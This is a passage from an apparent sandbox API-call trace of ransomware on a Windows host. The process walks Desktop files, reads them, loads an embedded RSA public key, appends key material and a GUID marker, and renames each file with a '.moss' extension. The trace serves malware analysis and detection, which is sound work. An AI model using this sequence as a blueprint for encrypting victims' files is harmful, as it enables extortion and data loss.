lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.382] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.382] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.382] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.382] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.382] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.382] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.382] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.383] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.383] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.383] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.383] CloseHandle (hObject=0x664) returned 1 [0169.388] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.388] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.388] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.388] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nH5qXP_95YPmxX.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nh5qxp_95ypmxx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nH5qXP_95YPmxX.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nh5qxp_95ypmxx.mkv.moss")) returned 1 [0169.389] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.389] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.389] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.390] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.390] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c00e00, ftCreationTime.dwHighDateTime=0x1d69ad4, ftLastAccessTime.dwLowDateTime=0xd158a480, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xb423d600, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0xabc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnB5h0yX46mreVq4.exe", cAlternateFileName="ONB5H0~1.EXE")) returned 1 [0169.391] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.391] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.391] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.391] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe") returned=".exe" [0169.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0169.392] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.392] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93f05ec0, ftCreationTime.dwHighDateTime=0x1d5e3bf, ftLastAccessTime.dwLowDateTime=0x1a1f0dc0, ftLastAccessTime.dwHighDateTime=0x1d5d8e9, ftLastWriteTime.dwLowDateTime=0x1a1f0dc0, ftLastWriteTime.dwHighDateTime=0x1d5d8e9, nFileSizeHigh=0x0, nFileSizeLow=0xeb83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pPZL.swf", cAlternateFileName="")) returned 1 [0169.392] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.392] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x76) returned 0xd34af8 [0169.392] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.392] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPZL.swf") returned=".swf" [0169.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPZL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppzl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.392] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=60291) returned 1 [0169.392] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.396] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xeb5d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.396] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.397] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.397] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.397] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.398] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xeb83, lpOverlapped=0x0) returned 1 [0169.398] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.399] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.399] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.400] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.400] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.401] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.401] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.401] GetLastError () returned 0x0 [0169.401] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.401] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.401] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.401] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.401] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.401] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.401] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.401] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb80) returned 0x3b62d40 [0169.402] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.402] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b454b8 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdf8 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45500 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe10 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe40 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe58 [0169.402] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.403] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.403] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe58 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe40 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.403] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.405] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.405] GetCurrentThreadId () returned 0x324 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32120 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.405] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.406] GetCurrentThreadId () returned 0x324 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.406] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.406] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.407] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xeb83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.407] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.407] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.408] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.408] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.408] CloseHandle (hObject=0x664) returned 1 [0169.409] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPZL.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppzl.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pPZL.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ppzl.swf.moss")) returned 1 [0169.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.410] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.410] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.412] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.412] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57810460, ftCreationTime.dwHighDateTime=0x1d5e7a9, ftLastAccessTime.dwLowDateTime=0xdc765c10, ftLastAccessTime.dwHighDateTime=0x1d5e772, ftLastWriteTime.dwLowDateTime=0xdc765c10, ftLastWriteTime.dwHighDateTime=0x1d5e772, nFileSizeHigh=0x0, nFileSizeLow=0x7e84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qrpy3cG52AHZ_9BZ.m4a", cAlternateFileName="QRPY3C~1.M4A")) returned 1 [0169.412] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qrpy3cG52AHZ_9BZ.m4a") returned=".m4a" [0169.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qrpy3cG52AHZ_9BZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qrpy3cg52ahz_9bz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.412] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=32388) returned 1 [0169.412] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.416] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7e5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.416] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.417] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7e84, lpOverlapped=0x0) returned 1 [0169.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.418] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.418] lstrlenA (lpString="-----BEGIN PUBLIC 